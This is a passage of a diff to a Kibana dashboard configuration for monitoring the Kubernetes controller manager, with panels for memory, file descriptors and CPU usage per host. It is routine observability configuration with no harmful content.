"otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "7b75d52d-c30f-4d3c-a1fc-f1a9ce764778" - ], - "layerId": "a2facaed-7c02-4fb6-9126-5512b8ffd26f", - "layerType": "data", - "palette": { - "name": "kibana_palette", - "type": "palette" - }, - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "73933c6b-b6da-45c6-a190-c501453f658f", - "xAccessor": "3ed7787d-1fbe-487f-a377-9a5e5e6f2571" - } - ], - "legend": { - "isVisible": true, - "position": "right", - "shouldTruncate": true - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": 
true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "xTitle": "", - "yTitle": "" - } + "size": 10 + }, + "scale": "ordinal", + "sourceField": "host.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 14, - "i": "6a8b9a40-11ec-4790-a38d-2d88c5468f12", - "w": 24, - "x": 24, - "y": 27 - }, - "panelIndex": "6a8b9a40-11ec-4790-a38d-2d88c5468f12", - "title": "Current unfinished work", - "type": "lens", - "version": "8.6.0" - }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": true, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } + "cf481e4f-b568-4306-8da9-5e3d516ccbea": { + "dataType": "number", + "isBucketed": false, + "label": "average(kubernetes.controllermanager.process.memory.resident.bytes)", + "operationType": "formula", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 1 + } + }, + "formula": "average(kubernetes.controllermanager.process.memory.resident.bytes)", + "isFormulaBroken": false + }, + "references": [ + "cf481e4f-b568-4306-8da9-5e3d516ccbeaX0" + ], + "scale": "ratio" }, - "description": "", - "params": { - "axis_formatter": "number", - "axis_position": "left", - "axis_scale": "normal", - "background_color": "rgba(239,249,218,1)", - "drop_last_bucket": 0, - "id": "6f526672-7eb3-4643-b49d-676d2eeac17b", - "index_pattern_ref_name": "metrics_c3fee68f-01c6-49da-a759-2900b1cd15bf_0_index_pattern", - "interval": "", - "isModelInvalid": false, - "markdown": "Process", - "markdown_css": "font-family:system-ui,\"Segoe UI\",Helvetica,Arial,sans-serif,\"Segoe UI Emoji\",\"Segoe UI Symbol\";font-weight:500;font-kerning:normal;font-size:36px;font-stretch:100%;font-style:normal;font-variant-caps:normal;font-variant-east-asian:normal;font-variant-ligatures:normal;font-variant-numeric:normal;\np {\n text-align: 
center;\n } a{text-decoration:none !important;}", - "markdown_vertical_align": "middle", - "max_lines_legend": 1, - "series": [ - { - "axis_position": "right", - "chart_type": "line", - "color": "#68BC00", - "fill": 0.5, - "formatter": "default", - "id": "d65c8740-c2c0-4471-9f94-38baadcf2df2", - "line_width": 1, - "metrics": [ - { - "id": "6a297bc8-ba40-4dbe-b5bc-6ca95dc292bb", - "type": "count" - } - ], - "override_index_pattern": 0, - "palette": { - "name": "default", - "type": "palette" - }, - "point_size": 1, - "separate_axis": 0, - "series_drop_last_bucket": 0, - "split_mode": "everything", - "stacked": "none", - "time_range_mode": "entire_time_range" - } - ], - "show_grid": 1, - "show_legend": 1, - "time_field": "", - "time_range_mode": "entire_time_range", - "tooltip_mode": "show_all", - "truncate_legend": 1, - "type": "markdown", - "use_kibana_indexes": true + "cf481e4f-b568-4306-8da9-5e3d516ccbeaX0": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of average(kubernetes.controllermanager.process.memory.resident.bytes)", + "operationType": "average", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "kubernetes.controllermanager.process.memory.resident.bytes" }, - "title": "", - "type": "metrics", - "uiState": {} + "d523e6d2-50f3-4b45-8815-8259df43850c": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "236aa40a-181f-4c61-af17-8df4ecba80d3", + "key": "kubernetes.controllermanager.process.cpu.sec", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": 
"kubernetes.controllermanager.process.cpu.sec" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 3, - "i": "c3fee68f-01c6-49da-a759-2900b1cd15bf", - "w": 48, - "x": 0, - "y": 41 + "fillOpacity": 0.3, + "layers": [ + { + "accessors": [ + "cf481e4f-b568-4306-8da9-5e3d516ccbea" + ], + "layerId": "77da5988-3f03-4e8f-b1e4-39a94d8bec07", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" + }, + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "7e1756d9-af1b-4204-a8d4-8c57987216f0", + "xAccessor": "d523e6d2-50f3-4b45-8815-8259df43850c", + "yConfig": [] + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right", + "shouldTruncate": false }, - "panelIndex": "c3fee68f-01c6-49da-a759-2900b1cd15bf", - "title": "", - "type": "visualization", - "version": "8.6.0" + "preferredSeriesType": "area", + "title": "Empty XY chart", + "valueLabels": "hide", + "valuesInLegend": false, + "xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-380c5d66-2e69-4e96-b5fb-ac4e5ab1c807", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Average resident memory" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 12, + "i": "1604f0de-edd6-456e-8670-ab9b33988abb", + "w": 24, + "x": 0, + "y": 50 + }, + "panelIndex": "1604f0de-edd6-456e-8670-ab9b33988abb", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-d3be0fa3-c7a4-49ba-b8cf-ab79f477f332", + "type": "index-pattern" + }, + { + "id": 
"metrics-*", + "name": "a781e55e-e2bc-4b36-b197-1b55842aeff7", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "d3be0fa3-c7a4-49ba-b8cf-ab79f477f332": { + "columnOrder": [ + "9edf62a7-afd2-4574-9937-34f7ee0c5fcd", + "236eb2de-d45f-43f2-83f4-5a1d7355132b", + "301759e0-f73e-4e6d-a7c5-d0938024e989", + "301759e0-f73e-4e6d-a7c5-d0938024e989X1", + "301759e0-f73e-4e6d-a7c5-d0938024e989X0" + ], + "columns": { + "236eb2de-d45f-43f2-83f4-5a1d7355132b": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "301759e0-f73e-4e6d-a7c5-d0938024e989": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Increases in Controller CPU", + "operationType": "formula", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 1, + "suffix": "s" + } }, - { - "id": "metrics-*", - "name": "daf730fb-a3b5-400a-acba-cff0c8ba607d", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "380c5d66-2e69-4e96-b5fb-ac4e5ab1c807": { - "columnOrder": [ - "6cbab896-ee42-4dad-8831-12f53cda0d6d", - "910bd079-4852-48bd-9d7a-e5eb940f0838", - "ee812faf-6f3c-4cc2-ad9a-27136340ef39", - "96c80749-da61-425a-b637-878d33e410fd", - "96c80749-da61-425a-b637-878d33e410fdX0", - "96c80749-da61-425a-b637-878d33e410fdX2", - "96c80749-da61-425a-b637-878d33e410fdX1", - "910bd079-4852-48bd-9d7a-e5eb940f0838X0", - "ee812faf-6f3c-4cc2-ad9a-27136340ef39X0" - ], - "columns": { - "6cbab896-ee42-4dad-8831-12f53cda0d6d": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Host", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": 
"alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "host.name" - }, - "910bd079-4852-48bd-9d7a-e5eb940f0838": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Resident memory", - "operationType": "formula", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 2 - } - }, - "formula": "last_value(kubernetes.controllermanager.process.memory.resident.bytes)", - "isFormulaBroken": false - }, - "references": [ - "910bd079-4852-48bd-9d7a-e5eb940f0838X0" - ], - "scale": "ratio" - }, - "910bd079-4852-48bd-9d7a-e5eb940f0838X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.controllermanager.process.memory.resident.bytes: *" - }, - "isBucketed": false, - "label": "Part of Resident memory", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.controllermanager.process.memory.resident.bytes" - }, - "96c80749-da61-425a-b637-878d33e410fd": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Open file descriptors usage", - "operationType": "formula", - "params": { - "format": { - "id": "percent", - "params": { - "decimals": 1 - } - }, - "formula": "last_value(kubernetes.controllermanager.process.fds.open.count)/last_value(kubernetes.controllermanager.process.fds.max.count)*100", - "isFormulaBroken": false - }, - "references": [ - "96c80749-da61-425a-b637-878d33e410fdX2" - ], - "scale": "ratio" - }, - "96c80749-da61-425a-b637-878d33e410fdX0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.controllermanager.process.fds.open.count: *" - }, - "isBucketed": false, - "label": "Part of Open file descriptors usage", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - 
}, - "scale": "ratio", - "sourceField": "kubernetes.controllermanager.process.fds.open.count" - }, - "96c80749-da61-425a-b637-878d33e410fdX1": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.controllermanager.process.fds.max.count: *" - }, - "isBucketed": false, - "label": "Part of Open file descriptors usage", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.controllermanager.process.fds.max.count" - }, - "96c80749-da61-425a-b637-878d33e410fdX2": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Open file descriptors usage", - "operationType": "math", - "params": { - "tinymathAst": { - "args": [ - { - "args": [ - "96c80749-da61-425a-b637-878d33e410fdX0", - "96c80749-da61-425a-b637-878d33e410fdX1" - ], - "name": "divide", - "type": "function" - }, - 100 - ], - "location": { - "max": 130, - "min": 0 - }, - "name": "multiply", - "text": "last_value(kubernetes.controllermanager.process.fds.open.count)/last_value(kubernetes.controllermanager.process.fds.max.count)*100", - "type": "function" - } - }, - "references": [ - "96c80749-da61-425a-b637-878d33e410fdX0", - "96c80749-da61-425a-b637-878d33e410fdX1" - ], - "scale": "ratio" - }, - "ee812faf-6f3c-4cc2-ad9a-27136340ef39": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Virtual memory", - "operationType": "formula", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 2 - } - }, - "formula": "last_value(kubernetes.controllermanager.process.memory.virtual.bytes)", - "isFormulaBroken": false - }, - "references": [ - "ee812faf-6f3c-4cc2-ad9a-27136340ef39X0" - ], - "scale": "ratio" - }, - "ee812faf-6f3c-4cc2-ad9a-27136340ef39X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.controllermanager.process.memory.virtual.bytes: *" - 
}, - "isBucketed": false, - "label": "Part of Virtual memory", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.controllermanager.process.memory.virtual.bytes" - } - }, - "incompleteColumns": {} - } - } - } + "formula": "counter_rate(last_value(kubernetes.controllermanager.process.cpu.sec))", + "isFormulaBroken": false + }, + "references": [ + "301759e0-f73e-4e6d-a7c5-d0938024e989X1" + ], + "scale": "ratio" + }, + "301759e0-f73e-4e6d-a7c5-d0938024e989X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.controllermanager.process.cpu.sec: *" + }, + "isBucketed": false, + "label": "Part of Increases in Controller CPU", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.controllermanager.process.cpu.sec" + }, + "301759e0-f73e-4e6d-a7c5-d0938024e989X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Increases in Controller CPU", + "operationType": "counter_rate", + "references": [ + "301759e0-f73e-4e6d-a7c5-d0938024e989X0" + ], + "scale": "ratio", + "timeScale": "s" + }, + "9edf62a7-afd2-4574-9937-34f7ee0c5fcd": { + "dataType": "string", + "isBucketed": true, + "label": "Top 20 values of host.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": false, + "type": "alphabetical" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "daf730fb-a3b5-400a-acba-cff0c8ba607d", - "key": "kubernetes.controllermanager.process.fds.open.count", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "kubernetes.controllermanager.process.fds.open.count" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + 
"orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "columns": [ - { - "alignment": "center", - "columnId": "6cbab896-ee42-4dad-8831-12f53cda0d6d" - }, - { - "alignment": "center", - "columnId": "910bd079-4852-48bd-9d7a-e5eb940f0838" - }, - { - "alignment": "center", - "columnId": "ee812faf-6f3c-4cc2-ad9a-27136340ef39", - "isTransposed": false - }, - { - "alignment": "center", - "colorMode": "text", - "columnId": "96c80749-da61-425a-b637-878d33e410fd", - "isTransposed": false, - "palette": { - "name": "custom", - "params": { - "colorStops": [ - { - "color": "#54B399", - "stop": 0 - }, - { - "color": "#e6ca49", - "stop": 60 - }, - { - "color": "#E7664C", - "stop": 90 - } - ], - "continuity": "above", - "name": "custom", - "rangeMax": null, - "rangeMin": 0, - "rangeType": "number", - "steps": 5, - "stops": [ - { - "color": "#54B399", - "stop": 60 - }, - { - "color": "#e6ca49", - "stop": 90 - }, - { - "color": "#E7664C", - "stop": 91 - } - ] - }, - "type": "palette" - } - } - ], - "layerId": "380c5d66-2e69-4e96-b5fb-ac4e5ab1c807", - "layerType": "data" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsDatatable" + "size": 20 + }, + "scale": "ordinal", + "sourceField": "host.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "a781e55e-e2bc-4b36-b197-1b55842aeff7", + "key": "kubernetes.controllermanager.process.cpu.sec", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "kubernetes.controllermanager.process.cpu.sec" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "fillOpacity": 0.3, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": 
true, + "yLeft": true, + "yRight": true + }, + "hideEndzones": false, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "301759e0-f73e-4e6d-a7c5-d0938024e989" + ], + "layerId": "d3be0fa3-c7a4-49ba-b8cf-ab79f477f332", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" }, - "enhancements": {}, - "hidePanelTitles": false + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "9edf62a7-afd2-4574-9937-34f7ee0c5fcd", + "xAccessor": "236eb2de-d45f-43f2-83f4-5a1d7355132b", + "yConfig": [ + { + "axisMode": "left", + "color": "#d6bf57", + "forAccessor": "301759e0-f73e-4e6d-a7c5-d0938024e989" + } + ] + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right", + "shouldTruncate": false }, - "gridData": { - "h": 6, - "i": "75255ce8-2d49-4b4f-ac0e-a20fe8f4daec", - "w": 24, - "x": 0, - "y": 44 + "preferredSeriesType": "area", + "showCurrentTimeMarker": false, + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "75255ce8-2d49-4b4f-ac0e-a20fe8f4daec", - "title": "Controller manager process data", - "type": "lens", - "version": "8.6.0" + "valueLabels": "hide", + "xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-77da5988-3f03-4e8f-b1e4-39a94d8bec07", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "236aa40a-181f-4c61-af17-8df4ecba80d3", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "77da5988-3f03-4e8f-b1e4-39a94d8bec07": { - "columnOrder": [ - "7e1756d9-af1b-4204-a8d4-8c57987216f0", - "d523e6d2-50f3-4b45-8815-8259df43850c", - "cf481e4f-b568-4306-8da9-5e3d516ccbea", - "cf481e4f-b568-4306-8da9-5e3d516ccbeaX0" - ], - "columns": { - "7e1756d9-af1b-4204-a8d4-8c57987216f0": { - 
"dataType": "string", - "isBucketed": true, - "label": "Top 10 values of host.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "host.name" - }, - "cf481e4f-b568-4306-8da9-5e3d516ccbea": { - "dataType": "number", - "isBucketed": false, - "label": "average(kubernetes.controllermanager.process.memory.resident.bytes)", - "operationType": "formula", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 1 - } - }, - "formula": "average(kubernetes.controllermanager.process.memory.resident.bytes)", - "isFormulaBroken": false - }, - "references": [ - "cf481e4f-b568-4306-8da9-5e3d516ccbeaX0" - ], - "scale": "ratio" - }, - "cf481e4f-b568-4306-8da9-5e3d516ccbeaX0": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of average(kubernetes.controllermanager.process.memory.resident.bytes)", - "operationType": "average", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "kubernetes.controllermanager.process.memory.resident.bytes" - }, - "d523e6d2-50f3-4b45-8815-8259df43850c": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "CPU usage increase over time" + }, + { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 3, + "i": "f8313a9d-ab58-448e-b183-75f914caf53f", + "w": 48, + "x": 0, + "y": 62 + }, + "panelIndex": 
"f8313a9d-ab58-448e-b183-75f914caf53f", + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": true, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "params": { + "axis_formatter": "number", + "axis_position": "left", + "axis_scale": "normal", + "background_color": "rgba(249,235,223,1)", + "drop_last_bucket": 0, + "id": "6f526672-7eb3-4643-b49d-676d2eeac17b", + "index_pattern_ref_name": "metrics_f8313a9d-ab58-448e-b183-75f914caf53f_0_index_pattern", + "interval": "", + "isModelInvalid": false, + "markdown": "HTTP Requests", + "markdown_css": "font-family:system-ui,\"Segoe UI\",Helvetica,Arial,sans-serif,\"Segoe UI Emoji\",\"Segoe UI Symbol\";font-weight:500;font-kerning:normal;font-size:36px;font-stretch:100%;font-style:normal;font-variant-caps:normal;font-variant-east-asian:normal;font-variant-ligatures:normal;font-variant-numeric:normal;\np {\n text-align: center;\n } a{text-decoration:none !important;}", + "markdown_vertical_align": "middle", + "max_lines_legend": 1, + "series": [ + { + "axis_position": "right", + "chart_type": "line", + "color": "#68BC00", + "fill": 0.5, + "formatter": "default", + "id": "d65c8740-c2c0-4471-9f94-38baadcf2df2", + "line_width": 1, + "metrics": [ + { + "id": "6a297bc8-ba40-4dbe-b5bc-6ca95dc292bb", + "type": "count" + } + ], + "override_index_pattern": 0, + "palette": { + "name": "default", + "type": "palette" + }, + "point_size": 1, + "separate_axis": 0, + "series_drop_last_bucket": 0, + "split_mode": "everything", + "stacked": "none", + "time_range_mode": "entire_time_range" + } + ], + "show_grid": 1, + "show_legend": 1, + "time_field": "", + "time_range_mode": "entire_time_range", + "tooltip_mode": "show_all", + "truncate_legend": 1, + "type": "markdown", + "use_kibana_indexes": true + }, + "title": "", + "type": "metrics", + "uiState": {} + }, + "type": "visualization" + }, + "title": "" + }, + { + 
"version": "8.9.0", + "type": "lens", + "gridData": { + "h": 6, + "i": "fd90adaf-517f-4b92-a5b5-c29f7a16663b", + "w": 24, + "x": 0, + "y": 65 + }, + "panelIndex": "fd90adaf-517f-4b92-a5b5-c29f7a16663b", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-1048fff9-f5a4-446b-8173-e9e22d4b1cff", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "11922ebb-686e-4ad0-a043-e425a0d2ce35", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "1048fff9-f5a4-446b-8173-e9e22d4b1cff": { + "columnOrder": [ + "37b94d21-2d12-4136-a81d-908d8fc7f78a", + "52732cce-1342-46e1-8273-82efeffe9aac", + "469efac9-749a-455e-9864-90dc0f5f954e", + "e014cfcb-3d50-4bbe-a6e6-4d8ea547ec4e" + ], + "columns": { + "37b94d21-2d12-4136-a81d-908d8fc7f78a": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Cluster", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "236aa40a-181f-4c61-af17-8df4ecba80d3", - "key": "kubernetes.controllermanager.process.cpu.sec", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "kubernetes.controllermanager.process.cpu.sec" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "fillOpacity": 0.3, - "layers": [ - { - "accessors": [ - "cf481e4f-b568-4306-8da9-5e3d516ccbea" - ], - "layerId": "77da5988-3f03-4e8f-b1e4-39a94d8bec07", - "layerType": "data", - "palette": { - "name": "default", - 
"type": "palette" - }, - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "7e1756d9-af1b-4204-a8d4-8c57987216f0", - "xAccessor": "d523e6d2-50f3-4b45-8815-8259df43850c", - "yConfig": [] - } - ], - "legend": { - "isVisible": true, - "legendSize": "large", - "position": "right", - "shouldTruncate": false - }, - "preferredSeriesType": "area", - "title": "Empty XY chart", - "valueLabels": "hide", - "valuesInLegend": false, - "xTitle": "", - "yTitle": "" - } + "size": 3 + }, + "scale": "ordinal", + "sourceField": "orchestrator.cluster.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 18, - "i": "303702e1-ba33-49f2-b337-4cc7d7305606", - "w": 24, - "x": 24, - "y": 44 - }, - "panelIndex": "303702e1-ba33-49f2-b337-4cc7d7305606", - "title": "Average resident memory", - "type": "lens", - "version": "8.6.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-d3be0fa3-c7a4-49ba-b8cf-ab79f477f332", - "type": "index-pattern" + "469efac9-749a-455e-9864-90dc0f5f954e": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Host", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - { - "id": "metrics-*", - "name": "a781e55e-e2bc-4b36-b197-1b55842aeff7", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "d3be0fa3-c7a4-49ba-b8cf-ab79f477f332": { - "columnOrder": [ - "9edf62a7-afd2-4574-9937-34f7ee0c5fcd", - "236eb2de-d45f-43f2-83f4-5a1d7355132b", - "301759e0-f73e-4e6d-a7c5-d0938024e989", - "301759e0-f73e-4e6d-a7c5-d0938024e989X1", - "301759e0-f73e-4e6d-a7c5-d0938024e989X0" - ], - "columns": { - "236eb2de-d45f-43f2-83f4-5a1d7355132b": { - "dataType": "date", - "isBucketed": true, 
- "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "301759e0-f73e-4e6d-a7c5-d0938024e989": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Increases in Controller CPU", - "operationType": "formula", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 1, - "suffix": "s" - } - }, - "formula": "counter_rate(last_value(kubernetes.controllermanager.process.cpu.sec))", - "isFormulaBroken": false - }, - "references": [ - "301759e0-f73e-4e6d-a7c5-d0938024e989X1" - ], - "scale": "ratio" - }, - "301759e0-f73e-4e6d-a7c5-d0938024e989X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.controllermanager.process.cpu.sec: *" - }, - "isBucketed": false, - "label": "Part of Increases in Controller CPU", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.controllermanager.process.cpu.sec" - }, - "301759e0-f73e-4e6d-a7c5-d0938024e989X1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Increases in Controller CPU", - "operationType": "counter_rate", - "references": [ - "301759e0-f73e-4e6d-a7c5-d0938024e989X0" - ], - "scale": "ratio", - "timeScale": "s" - }, - "9edf62a7-afd2-4574-9937-34f7ee0c5fcd": { - "dataType": "string", - "isBucketed": true, - "label": "Top 20 values of host.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": false, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 20 - }, - "scale": "ordinal", - "sourceField": "host.name" - } - }, - "incompleteColumns": {} - } - } - } + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { 
+ "id": "terms" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "a781e55e-e2bc-4b36-b197-1b55842aeff7", - "key": "kubernetes.controllermanager.process.cpu.sec", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "kubernetes.controllermanager.process.cpu.sec" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "size": 5 + }, + "scale": "ordinal", + "sourceField": "host.name" + }, + "52732cce-1342-46e1-8273-82efeffe9aac": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Leader controller manager name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "fillOpacity": 0.3, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "hideEndzones": false, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "301759e0-f73e-4e6d-a7c5-d0938024e989" - ], - "layerId": "d3be0fa3-c7a4-49ba-b8cf-ab79f477f332", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "9edf62a7-afd2-4574-9937-34f7ee0c5fcd", - "xAccessor": "236eb2de-d45f-43f2-83f4-5a1d7355132b", - "yConfig": [ - { - "axisMode": "left", - "color": "#d6bf57", - "forAccessor": "301759e0-f73e-4e6d-a7c5-d0938024e989" - } - ] - } - ], - "legend": { - "isVisible": true, - "legendSize": "large", - "position": "right", - 